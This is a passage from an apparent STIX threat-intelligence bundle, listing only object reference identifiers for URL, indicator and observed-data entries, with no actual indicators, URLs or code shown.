"url--58db80fc-d06c-46dd-a10b-4a9e02de0b81",
|
|
"indicator--58db80fd-f1a0-446b-96ec-459502de0b81",
|
|
"indicator--58db80fe-9d30-497c-95fa-418602de0b81",
|
|
"observed-data--58db80ff-c584-4ba7-b078-4bac02de0b81",
|
|
"url--58db80ff-c584-4ba7-b078-4bac02de0b81",
|
|
"indicator--58db8100-96e0-4e87-8b14-4ad702de0b81",
|
|
"indicator--58db8100-1da4-40aa-b8d2-49c502de0b81",
|
|
"observed-data--58db8101-6a14-491c-bc2f-490002de0b81",
|
|
"url--58db8101-6a14-491c-bc2f-490002de0b81",
|
|
"indicator--58db8102-6390-4d07-8cee-4b1902de0b81",
|
|
"indicator--58db8103-c77c-4ca0-8631-42c002de0b81",
|
|
"observed-data--58db8104-9ab0-4bdc-85ad-457202de0b81",
|
|
"url--58db8104-9ab0-4bdc-85ad-457202de0b81",
|
|
"indicator--58db8106-0d94-44b0-84b5-499502de0b81",
|
|
"indicator--58db8107-a53c-4cd9-b86c-430a02de0b81",
|
|
"observed-data--58db8107-62f0-43b5-b0cf-46fb02de0b81",
|
|
"url--58db8107-62f0-43b5-b0cf-46fb02de0b81",
|
|
"indicator--58db8108-73fc-4e37-b2e3-4e2702de0b81",
|
|
"indicator--58db8109-2678-4a3e-ad23-4f6902de0b81",
|
|
"observed-data--58db810a-1804-403f-b62c-4e2702de0b81",
|
|
"url--58db810a-1804-403f-b62c-4e2702de0b81",
|
|
"indicator--58db810b-7814-4eb7-923a-449c02de0b81",
|
|
"indicator--58db810c-e3e0-429a-b9b4-469f02de0b81",
|
|
"observed-data--58db810d-1888-47ed-9297-49f502de0b81",
|
|
"url--58db810d-1888-47ed-9297-49f502de0b81",
|
|
"indicator--58db810e-f78c-480a-8e06-46f202de0b81",
|
|
"indicator--58db810f-b4ec-45e7-bb0a-467b02de0b81",
|
|
"observed-data--58db8110-b384-4144-9aff-428202de0b81",
|
|
"url--58db8110-b384-4144-9aff-428202de0b81",
|
|
"indicator--58db8111-712c-49b2-a145-41c402de0b81",
|
|
"indicator--58db8112-75c8-4bdf-a52b-4b2902de0b81",
|
|
"observed-data--58db8113-3c88-4ab5-b217-471802de0b81",
|
|
"url--58db8113-3c88-4ab5-b217-471802de0b81",
|
|
"indicator--58db8114-8b94-4483-a487-4c3102de0b81",
|
|
"indicator--58db8115-0dbc-4f6c-9c4a-438502de0b81",
|
|
"observed-data--58db8116-dbcc-4aad-a513-412702de0b81",
|
|
"url--58db8116-dbcc-4aad-a513-412702de0b81",
|
|
"indicator--58db8117-ad9c-4e1a-93c1-4b4d02de0b81",
|
|
"indicator--58db8117-5aac-415e-947c-429702de0b81",
|
|
"observed-data--58db8118-f3a0-4700-9e28-44a702de0b81",
|
|
"url--58db8118-f3a0-4700-9e28-44a702de0b81",
|
|
"indicator--58db8119-d9e0-42b6-bd17-44e402de0b81",
|
|
"indicator--58db811a-9650-48af-9d5d-479002de0b81",
|
|
"observed-data--58db811b-be4c-4fb7-9a13-421e02de0b81",
|
|
"url--58db811b-be4c-4fb7-9a13-421e02de0b81",
|
|
"indicator--58db811c-66a0-4796-b042-4b4302de0b81",
|
|
"indicator--58db811d-5a78-44fe-b264-4c9002de0b81",
|
|
"observed-data--58db811e-2ce8-4aa9-9593-488002de0b81",
|
|
"url--58db811e-2ce8-4aa9-9593-488002de0b81",
|
|
"indicator--58db811f-90d8-4165-b542-472202de0b81",
|
|
"indicator--58db8120-0124-4077-925c-444b02de0b81",
|
|
"observed-data--58db8121-e920-4896-ba48-44f002de0b81",
|
|
"url--58db8121-e920-4896-ba48-44f002de0b81",
|
|
"indicator--58db8122-b2d8-4e50-9895-47b502de0b81",
|
|
"indicator--58db8123-e618-4df3-9d16-4c3502de0b81",
|
|
"observed-data--58db8124-d050-4bb0-b4c3-4ef502de0b81",
|
|
"url--58db8124-d050-4bb0-b4c3-4ef502de0b81",
|
|
"indicator--58db8125-36b0-40de-ba56-4fd302de0b81",
|
|
"indicator--58db8126-57a0-49e6-95fd-425e02de0b81",
|
|
"observed-data--58db8127-9fac-45e0-8c2d-469602de0b81",
|
|
"url--58db8127-9fac-45e0-8c2d-469602de0b81",
|
|
"indicator--58db8128-f56c-465f-81de-46ba02de0b81",
|
|
"indicator--58db8129-4348-48c8-bb1c-4bc702de0b81",
|
|
"observed-data--58db8129-37c4-489e-a9e2-487102de0b81",
|
|
"url--58db8129-37c4-489e-a9e2-487102de0b81",
|
|
"indicator--58db812a-5910-4e05-aec1-4bd502de0b81",
|
|
"indicator--58db812b-6588-440d-9069-49f502de0b81",
|
|
"observed-data--58db812c-45a4-424b-9ef5-480102de0b81",
|
|
"url--58db812c-45a4-424b-9ef5-480102de0b81",
|
|
"indicator--58db812d-d9ac-4878-8fdb-484f02de0b81",
|
|
"indicator--58db812e-f6d4-4ec0-b1d6-4ef002de0b81",
|
|
"observed-data--58db812f-bbf4-4bb2-894b-429102de0b81",
|
|
"url--58db812f-bbf4-4bb2-894b-429102de0b81",
|
|
"indicator--58db8130-1074-4b15-808c-469402de0b81",
|
|
"indicator--58db8131-272c-4402-a44f-42f202de0b81",
|
|
"observed-data--58db8132-3eb0-403b-8162-4cc302de0b81",
|
|
"url--58db8132-3eb0-403b-8162-4cc302de0b81",
|
|
"indicator--58db8133-e7f0-48a7-8ecd-482202de0b81",
|
|
"indicator--58db8134-13ac-4544-b87c-4dc102de0b81",
|
|
"observed-data--58db8135-9444-46e5-8b88-493502de0b81",
|
|
"url--58db8135-9444-46e5-8b88-493502de0b81",
|
|
"indicator--58db8136-4d70-4f6d-b5fa-4ed902de0b81",
|
|
"indicator--58db8137-f364-484f-bb8d-481f02de0b81",
|
|
"observed-data--58db8137-fc8c-4c62-beb8-400802de0b81",
|
|
"url--58db8137-fc8c-4c62-beb8-400802de0b81",
|
|
"indicator--58db8138-eb70-4f6b-a886-4c3e02de0b81",
|
|
"indicator--58db8139-1e38-4630-834e-406402de0b81",
|
|
"observed-data--58db813a-8df8-452c-aff0-4bcf02de0b81",
|
|
"url--58db813a-8df8-452c-aff0-4bcf02de0b81",
|
|
"indicator--58db813b-c860-4bb7-8d64-47e602de0b81",
|
|
"indicator--58db813c-cc88-4b05-b1e4-421902de0b81",
|
|
"observed-data--58db813d-4bb0-468b-b1f2-4dad02de0b81",
|
|
"url--58db813d-4bb0-468b-b1f2-4dad02de0b81",
|
|
"indicator--58db813e-e4cc-4c9a-8024-445d02de0b81",
|
|
"indicator--58db813f-1368-4490-8ee3-4c2802de0b81",
|
|
"observed-data--58db8140-fc30-4e2c-9557-4dc202de0b81",
|
|
"url--58db8140-fc30-4e2c-9557-4dc202de0b81",
|
|
"indicator--58db8141-f000-4871-b987-403b02de0b81",
|
|
"indicator--58db8142-0b4c-43d1-9f04-4cf702de0b81",
|
|
"observed-data--58db8143-ebf4-4f11-ad82-481902de0b81",
|
|
"url--58db8143-ebf4-4f11-ad82-481902de0b81",
|
|
"indicator--58db8144-571c-4efa-b2c6-4e6a02de0b81",
|
|
"indicator--58db8144-e95c-4737-b7ca-478c02de0b81",
|
|
"observed-data--58db8145-8a74-493d-b130-4c2402de0b81",
|
|
"url--58db8145-8a74-493d-b130-4c2402de0b81",
|
|
"indicator--58db8146-cd3c-4589-a69d-47e002de0b81",
|
|
"indicator--58db8147-ea44-414d-a156-442202de0b81",
|
|
"observed-data--58db8148-9e6c-4e75-9ac7-44c502de0b81",
|
|
"url--58db8148-9e6c-4e75-9ac7-44c502de0b81",
|
|
"indicator--58db8149-ca60-4be9-a584-4f9002de0b81",
|
|
"indicator--58db814a-9c54-4ccd-aac9-4b1402de0b81",
|
|
"observed-data--58db814b-094c-4a34-a404-47d102de0b81",
|
|
"url--58db814b-094c-4a34-a404-47d102de0b81",
|
|
"indicator--58db814c-d11c-4990-8854-4bd602de0b81",
|
|
"indicator--58db814d-a550-4214-afb5-499402de0b81",
|
|
"observed-data--58db814e-8084-479f-95e5-43a602de0b81",
|
|
"url--58db814e-8084-479f-95e5-43a602de0b81",
|
|
"indicator--58db814f-a84c-4cfc-94bd-4fd702de0b81",
|
|
"indicator--58db814f-f45c-45b2-90de-4c5002de0b81",
|
|
"observed-data--58db8150-b26c-47c4-b734-4e6002de0b81",
|
|
"url--58db8150-b26c-47c4-b734-4e6002de0b81",
|
|
"indicator--58db8151-d750-4ce3-95f6-435f02de0b81",
|
|
"indicator--58db8152-b790-4d35-b785-405602de0b81",
|
|
"observed-data--58db8153-2790-44bb-ad3a-49bd02de0b81",
|
|
"url--58db8153-2790-44bb-ad3a-49bd02de0b81",
|
|
"indicator--58db8154-73c8-4ef6-b5ae-44e902de0b81",
|
|
"indicator--58db8155-0cec-4890-b51b-4c4602de0b81",
|
|
"observed-data--58db8156-d5e8-41f3-bce0-4d4302de0b81",
|
|
"url--58db8156-d5e8-41f3-bce0-4d4302de0b81",
|
|
"indicator--58db8157-0544-4c9e-a5ec-446802de0b81",
|
|
"indicator--58db8158-c3e4-469a-b3cb-4c9f02de0b81",
|
|
"observed-data--58db8159-c2c4-4641-a99c-4f7e02de0b81",
|
|
"url--58db8159-c2c4-4641-a99c-4f7e02de0b81",
|
|
"indicator--58db815a-4ecc-4fee-b3fd-454202de0b81",
|
|
"indicator--58db815a-fb78-4d7a-a487-4b1302de0b81",
|
|
"observed-data--58db815b-a5fc-4e91-969d-423202de0b81",
|
|
"url--58db815b-a5fc-4e91-969d-423202de0b81",
|
|
"indicator--58db815c-6050-47fe-93c0-48a702de0b81",
|
|
"indicator--58db815d-a808-4fd2-a50b-424e02de0b81",
|
|
"observed-data--58db815e-0ddc-422b-86dc-45df02de0b81",
|
|
"url--58db815e-0ddc-422b-86dc-45df02de0b81",
|
|
"indicator--58db815f-8be4-43ab-8e33-495502de0b81",
|
|
"indicator--58db8160-814c-4373-89af-424b02de0b81",
|
|
"observed-data--58db8161-3720-4ca4-a64d-4ecc02de0b81",
|
|
"url--58db8161-3720-4ca4-a64d-4ecc02de0b81",
|
|
"indicator--58db8162-692c-4c6c-86af-451602de0b81",
|
|
"indicator--58db8163-1f94-4eb0-907f-4d8f02de0b81",
|
|
"observed-data--58db8164-fad4-4860-b414-4c5e02de0b81",
|
|
"url--58db8164-fad4-4860-b414-4c5e02de0b81",
|
|
"indicator--58db8165-b018-4a0d-889f-4bb202de0b81",
|
|
"indicator--58db8166-a2b8-4c05-8cd7-482c02de0b81",
|
|
"observed-data--58db8167-9f90-49a8-8c55-44fd02de0b81",
|
|
"url--58db8167-9f90-49a8-8c55-44fd02de0b81",
|
|
"indicator--58db8168-0310-4ed8-9352-43d902de0b81",
|
|
"indicator--58db8169-d260-4a53-8590-4acf02de0b81",
|
|
"observed-data--58db816a-0edc-4df3-a45e-475802de0b81",
|
|
"url--58db816a-0edc-4df3-a45e-475802de0b81",
|
|
"indicator--58db816b-dc60-4e6f-81bd-4e5b02de0b81",
|
|
"indicator--58db816b-45cc-4d26-a7c2-449d02de0b81",
|
|
"observed-data--58db816c-5de0-4b13-b24d-42c402de0b81",
|
|
"url--58db816c-5de0-4b13-b24d-42c402de0b81",
|
|
"indicator--58db816e-bd64-49af-aad6-4cbb02de0b81",
|
|
"indicator--58db816f-a6b0-45a2-abbd-4c5702de0b81",
|
|
"observed-data--58db816f-c45c-4dd7-85ad-431702de0b81",
|
|
"url--58db816f-c45c-4dd7-85ad-431702de0b81",
|
|
"indicator--58db8170-48b4-4b6d-a8e4-409802de0b81",
|
|
"indicator--58db8171-e470-455d-a28e-460d02de0b81",
|
|
"observed-data--58db8172-f078-4630-a811-42f602de0b81",
|
|
"url--58db8172-f078-4630-a811-42f602de0b81",
|
|
"indicator--58db8173-6dec-41ba-a9d5-444502de0b81",
|
|
"indicator--58db8174-0430-4625-8bd8-475202de0b81",
|
|
"observed-data--58db8175-6568-4074-89e0-464102de0b81",
|
|
"url--58db8175-6568-4074-89e0-464102de0b81",
|
|
"indicator--58db8176-a518-4246-a6af-48de02de0b81",
|
|
"indicator--58db8177-4948-4aa5-9785-4e5e02de0b81",
|
|
"observed-data--58db8178-fb10-45ea-899c-478502de0b81",
|
|
"url--58db8178-fb10-45ea-899c-478502de0b81",
|
|
"indicator--58db8179-a62c-4780-80d4-43ec02de0b81",
|
|
"indicator--58db817a-b82c-4af7-92fa-4ec902de0b81",
|
|
"observed-data--58db817b-7d34-4634-9a1a-466a02de0b81",
|
|
"url--58db817b-7d34-4634-9a1a-466a02de0b81",
|
|
"indicator--58db817c-dc74-4be6-8ab2-44c702de0b81",
|
|
"indicator--58db817d-9b94-43a1-8655-4b2f02de0b81",
|
|
"observed-data--58db817e-5b30-4095-a575-4b3702de0b81",
|
|
"url--58db817e-5b30-4095-a575-4b3702de0b81",
|
|
"indicator--58db817f-4bcc-4772-a353-4aa402de0b81",
|
|
"indicator--58db8180-23d0-4915-af2c-4ae302de0b81",
|
|
"observed-data--58db8181-a120-48c0-8a62-48f902de0b81",
|
|
"url--58db8181-a120-48c0-8a62-48f902de0b81",
|
|
"indicator--58db8182-cda8-433c-8ae5-447d02de0b81",
|
|
"indicator--58db8183-da18-46ee-b763-42f402de0b81",
|
|
"observed-data--58db8184-226c-4709-abc7-4a0c02de0b81",
|
|
"url--58db8184-226c-4709-abc7-4a0c02de0b81",
|
|
"indicator--58db8185-70f4-40b0-bf4c-49c302de0b81",
|
|
"indicator--58db8186-8318-491d-baad-49ce02de0b81",
|
|
"observed-data--58db8187-f938-4c4e-bdca-4e2d02de0b81",
|
|
"url--58db8187-f938-4c4e-bdca-4e2d02de0b81",
|
|
"indicator--58db8188-bedc-4309-894c-40a102de0b81",
|
|
"indicator--58db8189-f668-4bc1-ac89-40fb02de0b81",
|
|
"observed-data--58db818a-8cd0-482c-b093-44e202de0b81",
|
|
"url--58db818a-8cd0-482c-b093-44e202de0b81",
|
|
"indicator--58db818b-37ec-4b36-aa38-415602de0b81",
|
|
"indicator--58db818c-3030-487a-b4ac-48db02de0b81",
|
|
"observed-data--58db818c-d990-4031-8bfb-4fcf02de0b81",
|
|
"url--58db818c-d990-4031-8bfb-4fcf02de0b81",
|
|
"indicator--58db818d-be94-469f-9d3b-447202de0b81",
|
|
"indicator--58db818e-435c-4cbd-8ced-478002de0b81",
|
|
"observed-data--58db818f-3318-4b83-a90e-4ddd02de0b81",
|
|
"url--58db818f-3318-4b83-a90e-4ddd02de0b81",
|
|
"indicator--58db8190-0020-4471-b498-469702de0b81",
|
|
"indicator--58db8191-3248-440b-89ac-422902de0b81",
|
|
"observed-data--58db8192-a3bc-43ed-9068-4f0f02de0b81",
|
|
"url--58db8192-a3bc-43ed-9068-4f0f02de0b81",
|
|
"indicator--58db8193-1020-45ec-b344-488902de0b81",
|
|
"indicator--58db8194-1ca0-40ba-b83d-468802de0b81",
|
|
"observed-data--58db8195-ec68-4ebf-9336-40be02de0b81",
|
|
"url--58db8195-ec68-4ebf-9336-40be02de0b81",
|
|
"indicator--58db8196-d3dc-4e95-8e7b-416b02de0b81",
|
|
"indicator--58db8197-60c8-4922-ad5e-411202de0b81",
|
|
"observed-data--58db8198-f3dc-4610-8a58-46b102de0b81",
|
|
"url--58db8198-f3dc-4610-8a58-46b102de0b81",
|
|
"indicator--58db8199-b0b4-486c-831d-4fc402de0b81",
|
|
"indicator--58db819a-edd8-4cab-820c-488d02de0b81",
|
|
"observed-data--58db819b-9e50-4fad-92de-4d0d02de0b81",
|
|
"url--58db819b-9e50-4fad-92de-4d0d02de0b81",
|
|
"indicator--58db819c-adf0-4179-8587-40d602de0b81",
|
|
"indicator--58db819c-8e38-4794-8319-4a7b02de0b81",
|
|
"observed-data--58db819d-e1bc-4d27-80ee-4cab02de0b81",
|
|
"url--58db819d-e1bc-4d27-80ee-4cab02de0b81",
|
|
"indicator--58db819e-ad28-4c1c-bcf0-4a2802de0b81",
|
|
"indicator--58db819f-63cc-410c-b69d-493f02de0b81",
|
|
"observed-data--58db81a0-d998-4a69-8ccd-45a102de0b81",
|
|
"url--58db81a0-d998-4a69-8ccd-45a102de0b81",
|
|
"indicator--58db81a1-d614-41d5-8256-467c02de0b81",
|
|
"indicator--58db81a2-b7d8-4be1-8ee4-4aa502de0b81",
|
|
"observed-data--58db81a3-327c-43c3-9ecd-46e102de0b81",
|
|
"url--58db81a3-327c-43c3-9ecd-46e102de0b81",
|
|
"indicator--58db81a4-15fc-48fd-b2dc-432a02de0b81",
|
|
"indicator--58db81a5-6dd0-468f-9bf4-41a602de0b81",
|
|
"observed-data--58db81a6-3d78-4e63-be62-4b1b02de0b81",
|
|
"url--58db81a6-3d78-4e63-be62-4b1b02de0b81",
|
|
"indicator--58db81a7-d958-4aef-ae76-4cb602de0b81",
|
|
"indicator--58db81a8-b3bc-45d4-bf68-4d6202de0b81",
|
|
"observed-data--58db81a9-2e2c-448d-bf07-484602de0b81",
|
|
"url--58db81a9-2e2c-448d-bf07-484602de0b81",
|
|
"indicator--58db81a9-3700-4779-9af5-405a02de0b81",
|
|
"indicator--58db81aa-7efc-42d6-a870-476502de0b81",
|
|
"observed-data--58db81ab-18d8-4261-bea6-44c902de0b81",
|
|
"url--58db81ab-18d8-4261-bea6-44c902de0b81",
|
|
"indicator--58db81ac-9880-4af1-b4ff-403a02de0b81",
|
|
"indicator--58db81ad-9d3c-4395-9967-4bae02de0b81",
|
|
"observed-data--58db81ae-c66c-4bc4-b3e7-496b02de0b81",
|
|
"url--58db81ae-c66c-4bc4-b3e7-496b02de0b81",
|
|
"indicator--58db81af-34e8-450f-b196-462e02de0b81",
|
|
"indicator--58db81b0-3bd4-4f83-b39f-47a702de0b81",
|
|
"observed-data--58db81b1-00e8-457c-9fc1-455f02de0b81",
|
|
"url--58db81b1-00e8-457c-9fc1-455f02de0b81",
|
|
"indicator--58db81b2-4c88-48a9-b7f5-479802de0b81",
|
|
"indicator--58db81b3-b908-4eea-a4aa-40a302de0b81",
|
|
"observed-data--58db81b4-f308-45b4-b283-471802de0b81",
|
|
"url--58db81b4-f308-45b4-b283-471802de0b81",
|
|
"indicator--58db81b5-9534-4fb9-aec5-4a3b02de0b81",
|
|
"indicator--58db81b6-cc5c-4ee3-8427-477802de0b81",
|
|
"observed-data--58db81b7-4ab0-47ae-b479-476202de0b81",
|
|
"url--58db81b7-4ab0-47ae-b479-476202de0b81",
|
|
"indicator--58db81b8-36f8-4438-854a-471402de0b81",
|
|
"indicator--58db81b9-94b4-4790-82fc-454b02de0b81",
|
|
"observed-data--58db81ba-bb74-453a-8623-491902de0b81",
|
|
"url--58db81ba-bb74-453a-8623-491902de0b81",
|
|
"indicator--58db81bb-8230-4c39-a44c-47cb02de0b81",
|
|
"indicator--58db81bb-26bc-46b9-b5b8-477c02de0b81",
|
|
"observed-data--58db81bc-f564-4a74-8b1d-4d5702de0b81",
|
|
"url--58db81bc-f564-4a74-8b1d-4d5702de0b81",
|
|
"indicator--58db81bd-3488-44f0-8363-4f6f02de0b81",
|
|
"indicator--58db81be-75cc-4f4e-bb10-41ba02de0b81",
|
|
"observed-data--58db81bf-43b8-47fe-b8ef-44b702de0b81",
|
|
"url--58db81bf-43b8-47fe-b8ef-44b702de0b81",
|
|
"indicator--58db81c0-f7d0-4d53-951f-465d02de0b81",
|
|
"indicator--58db81c1-f93c-43a0-a02a-472d02de0b81",
|
|
"observed-data--58db81c2-780c-4b58-be5c-435102de0b81",
|
|
"url--58db81c2-780c-4b58-be5c-435102de0b81",
|
|
"indicator--58db81c3-ef78-41e7-8e4f-482d02de0b81",
|
|
"indicator--58db81c4-a7bc-4654-ac4b-4b7102de0b81",
|
|
"observed-data--58db81c5-5314-4d5a-8452-4afa02de0b81",
|
|
"url--58db81c5-5314-4d5a-8452-4afa02de0b81",
|
|
"indicator--58db81c6-071c-4e63-a55e-403302de0b81",
|
|
"indicator--58db81c7-cc1c-4afa-a386-485802de0b81",
|
|
"observed-data--58db81c8-3ff0-44b7-a007-484902de0b81",
|
|
"url--58db81c8-3ff0-44b7-a007-484902de0b81",
|
|
"indicator--58db81c9-23a4-4e6d-b6fc-4ea802de0b81",
|
|
"indicator--58db81ca-2b74-4388-832b-414f02de0b81",
|
|
"observed-data--58db81cb-11f8-41e7-ac71-4bf002de0b81",
|
|
"url--58db81cb-11f8-41e7-ac71-4bf002de0b81",
|
|
"indicator--58db81cc-2164-44a3-9a11-4aee02de0b81",
|
|
"indicator--58db81cd-9fec-48fa-9403-400802de0b81",
|
|
"observed-data--58db81ce-7908-4d25-a495-48b102de0b81",
|
|
"url--58db81ce-7908-4d25-a495-48b102de0b81",
|
|
"indicator--58db81cf-814c-4f07-a5d0-494502de0b81",
|
|
"indicator--58db81d0-8264-4403-818c-4f5e02de0b81",
|
|
"observed-data--58db81d1-224c-4822-b77a-4bcb02de0b81",
|
|
"url--58db81d1-224c-4822-b77a-4bcb02de0b81",
|
|
"indicator--58db81d2-25ec-430b-9ca9-4f3202de0b81",
|
|
"indicator--58db81d3-98a4-431e-935f-410202de0b81",
|
|
"observed-data--58db81d4-8940-4e92-89a5-49c702de0b81",
|
|
"url--58db81d4-8940-4e92-89a5-49c702de0b81",
|
|
"indicator--58db81d5-7ef8-46f6-b7b4-49b502de0b81",
|
|
"indicator--58db81d6-7f00-4e6c-a963-473b02de0b81",
|
|
"observed-data--58db81d7-520c-4854-bb16-428802de0b81",
|
|
"url--58db81d7-520c-4854-bb16-428802de0b81",
|
|
"indicator--58db81d8-a9e8-4b25-9535-4a0602de0b81",
|
|
"indicator--58db81d9-00d8-435b-bfaa-45cc02de0b81",
|
|
"observed-data--58db81da-bb48-4a20-8f61-495a02de0b81",
|
|
"url--58db81da-bb48-4a20-8f61-495a02de0b81",
|
|
"indicator--58db81db-cb6c-492e-aba3-4d3f02de0b81",
|
|
"indicator--58db81dc-2f7c-4aea-a0ec-44a402de0b81",
|
|
"observed-data--58db81dd-9030-4638-8e58-4fe502de0b81",
|
|
"url--58db81dd-9030-4638-8e58-4fe502de0b81",
|
|
"indicator--58db81de-0310-4e92-a037-41ea02de0b81",
|
|
"indicator--58db81df-65b4-4f42-ab07-400102de0b81",
|
|
"observed-data--58db81e0-d254-4450-b3ce-4c2302de0b81",
|
|
"url--58db81e0-d254-4450-b3ce-4c2302de0b81",
|
|
"indicator--58db81e1-9af8-4770-bd8d-4a1d02de0b81",
|
|
"indicator--58db81e2-be48-4d14-8a6f-407402de0b81",
|
|
"observed-data--58db81e3-640c-4467-99b5-472102de0b81",
|
|
"url--58db81e3-640c-4467-99b5-472102de0b81",
|
|
"indicator--58db81e4-97d4-4740-a318-451a02de0b81",
|
|
"indicator--58db81e5-03cc-4b0f-90d5-452a02de0b81",
|
|
"observed-data--58db81e6-7e8c-42d8-85ce-4c4902de0b81",
|
|
"url--58db81e6-7e8c-42d8-85ce-4c4902de0b81",
|
|
"indicator--58db81e7-7574-4d14-b2ed-4e9002de0b81",
|
|
"indicator--58db81e8-00f0-4b54-8b33-487f02de0b81",
|
|
"observed-data--58db81e8-ebac-4916-b187-4a6e02de0b81",
|
|
"url--58db81e8-ebac-4916-b187-4a6e02de0b81",
|
|
"indicator--58db81e9-2058-44f9-ab87-488b02de0b81",
|
|
"indicator--58db81ea-9e40-451d-b371-47c602de0b81",
|
|
"observed-data--58db81eb-d220-490f-9716-418002de0b81",
|
|
"url--58db81eb-d220-490f-9716-418002de0b81",
|
|
"indicator--58db81ec-4ea4-4dba-8db5-49e702de0b81",
|
|
"indicator--58db81ed-8f24-4d24-ab2a-464002de0b81",
|
|
"observed-data--58db81ee-6674-4254-9170-49fc02de0b81",
|
|
"url--58db81ee-6674-4254-9170-49fc02de0b81",
|
|
"indicator--58db81ef-5ff8-4080-a856-409602de0b81",
|
|
"indicator--58db81f0-532c-4e12-9892-40c002de0b81",
|
|
"observed-data--58db81f1-33d8-4b55-911a-49db02de0b81",
|
|
"url--58db81f1-33d8-4b55-911a-49db02de0b81",
|
|
"indicator--58db81f2-1f8c-4cbc-a1f5-436c02de0b81",
|
|
"indicator--58db81f3-b72c-4f0e-95bb-497402de0b81",
|
|
"observed-data--58db81f4-4c44-4438-b49b-4c0602de0b81",
|
|
"url--58db81f4-4c44-4438-b49b-4c0602de0b81",
|
|
"indicator--58db81f5-0508-44b2-8e59-496302de0b81",
|
|
"indicator--58db81f6-a938-4e20-a81f-436202de0b81",
|
|
"observed-data--58db81f7-06bc-4370-bc05-47ca02de0b81",
|
|
"url--58db81f7-06bc-4370-bc05-47ca02de0b81",
|
|
"indicator--58db81f8-de58-41fd-aeb5-49ed02de0b81",
|
|
"indicator--58db81f9-fc00-48b2-a142-47b002de0b81",
|
|
"observed-data--58db81fa-d03c-47db-b6fa-469802de0b81",
|
|
"url--58db81fa-d03c-47db-b6fa-469802de0b81",
|
|
"indicator--58db81fc-9a58-4174-85c3-480002de0b81",
|
|
"indicator--58db81fd-2134-41bb-8167-4bde02de0b81",
|
|
"observed-data--58db81fe-0b70-4514-9261-48ab02de0b81",
|
|
"url--58db81fe-0b70-4514-9261-48ab02de0b81",
|
|
"indicator--58db81ff-9b4c-46b0-bafa-466402de0b81",
|
|
"indicator--58db8200-419c-4daa-ade8-4fd702de0b81",
|
|
"observed-data--58db8200-ee98-47c3-9c4b-4f3302de0b81",
|
|
"url--58db8200-ee98-47c3-9c4b-4f3302de0b81",
|
|
"indicator--58db8201-215c-4a34-b03d-405b02de0b81",
|
|
"indicator--58db8202-73b4-4aaf-abd5-45df02de0b81",
|
|
"observed-data--58db8203-1e68-4ff0-9b11-4a4e02de0b81",
|
|
"url--58db8203-1e68-4ff0-9b11-4a4e02de0b81",
|
|
"indicator--58db8204-7100-4f07-8710-48c902de0b81",
|
|
"indicator--58db8205-41b8-462e-bbd1-440e02de0b81",
|
|
"observed-data--58db8206-26dc-4899-94bb-436602de0b81",
|
|
"url--58db8206-26dc-4899-94bb-436602de0b81",
|
|
"indicator--58db8207-6dbc-4a65-aaa2-41d502de0b81",
|
|
"indicator--58db8208-85f0-45a9-89b9-493302de0b81",
|
|
"observed-data--58db8209-3e20-4439-bf8e-4ff002de0b81",
|
|
"url--58db8209-3e20-4439-bf8e-4ff002de0b81",
|
|
"indicator--58db820a-6ad8-497d-95b6-425b02de0b81",
|
|
"indicator--58db820b-e9b4-4c1f-b3c1-4a4702de0b81",
|
|
"observed-data--58db820b-b3d8-49ea-b0f3-4e0202de0b81",
|
|
"url--58db820b-b3d8-49ea-b0f3-4e0202de0b81",
|
|
"indicator--58db820c-04a0-4227-ac77-433a02de0b81",
|
|
"indicator--58db820d-8464-4941-b232-484902de0b81",
|
|
"observed-data--58db820e-8ccc-4884-a821-455d02de0b81",
|
|
"url--58db820e-8ccc-4884-a821-455d02de0b81",
|
|
"indicator--58db820f-c4d0-4eec-9915-424e02de0b81",
|
|
"indicator--58db8210-c830-4bb9-845b-417b02de0b81",
|
|
"observed-data--58db8211-3e74-4051-9ca2-41eb02de0b81",
|
|
"url--58db8211-3e74-4051-9ca2-41eb02de0b81",
|
|
"indicator--58db8212-d690-4846-8b46-4c3c02de0b81",
|
|
"indicator--58db8213-acb4-4a6e-8b03-486202de0b81",
|
|
"observed-data--58db8214-4f78-4d53-91b8-4e0102de0b81",
|
|
"url--58db8214-4f78-4d53-91b8-4e0102de0b81",
|
|
"indicator--58db8215-c3ec-4f92-b93a-42ec02de0b81",
|
|
"indicator--58db8215-a304-4768-aee2-494402de0b81",
|
|
"observed-data--58db8216-4d38-4e77-887a-443302de0b81",
|
|
"url--58db8216-4d38-4e77-887a-443302de0b81",
|
|
"indicator--58db8217-79a0-455e-b139-4ad502de0b81",
|
|
"indicator--58db8218-8cf8-47e8-a97b-443f02de0b81",
|
|
"observed-data--58db8219-281c-4a66-82ec-46ce02de0b81",
|
|
"url--58db8219-281c-4a66-82ec-46ce02de0b81",
|
|
"indicator--58db821a-e194-4c08-8b93-46f602de0b81",
|
|
"indicator--58db821b-f624-4c05-a11e-4e3002de0b81",
|
|
"observed-data--58db821c-d2ac-4b70-92d0-44da02de0b81",
|
|
"url--58db821c-d2ac-4b70-92d0-44da02de0b81",
|
|
"indicator--58db821d-3238-4ed9-8e5a-417102de0b81",
|
|
"indicator--58db821e-6d08-49a5-9a43-4ff702de0b81",
|
|
"observed-data--58db821f-c040-4c2c-a508-4c4902de0b81",
|
|
"url--58db821f-c040-4c2c-a508-4c4902de0b81",
|
|
"indicator--58db8220-7ae8-4d93-bd61-4bd102de0b81",
|
|
"indicator--58db8221-63e0-4eac-955a-496a02de0b81",
|
|
"observed-data--58db8222-d164-43f7-a08a-44d302de0b81",
|
|
"url--58db8222-d164-43f7-a08a-44d302de0b81",
|
|
"indicator--58db8223-3fb0-4944-bcb2-47ab02de0b81",
|
|
"indicator--58db8224-4e08-4fe5-b7c6-495802de0b81",
|
|
"observed-data--58db8224-7740-431d-82e2-4c9402de0b81",
|
|
"url--58db8224-7740-431d-82e2-4c9402de0b81",
|
|
"indicator--58db8225-eb2c-42e8-8a82-447702de0b81",
|
|
"indicator--58db8226-95fc-4a0f-b4c1-447a02de0b81",
|
|
"observed-data--58db8227-3240-4b19-9c31-4da002de0b81",
|
|
"url--58db8227-3240-4b19-9c31-4da002de0b81",
|
|
"indicator--58db8228-fb04-495d-8915-41f702de0b81",
|
|
"indicator--58db8229-2274-4d38-89ca-4ae502de0b81",
|
|
"observed-data--58db822a-a024-42fe-8393-47ce02de0b81",
|
|
"url--58db822a-a024-42fe-8393-47ce02de0b81",
|
|
"indicator--58db822b-9e74-4a18-a510-429c02de0b81",
|
|
"indicator--58db822c-1f48-4b9d-ac43-451502de0b81",
|
|
"observed-data--58db822d-2c2c-4c8e-93fd-4f7302de0b81",
|
|
"url--58db822d-2c2c-4c8e-93fd-4f7302de0b81",
|
|
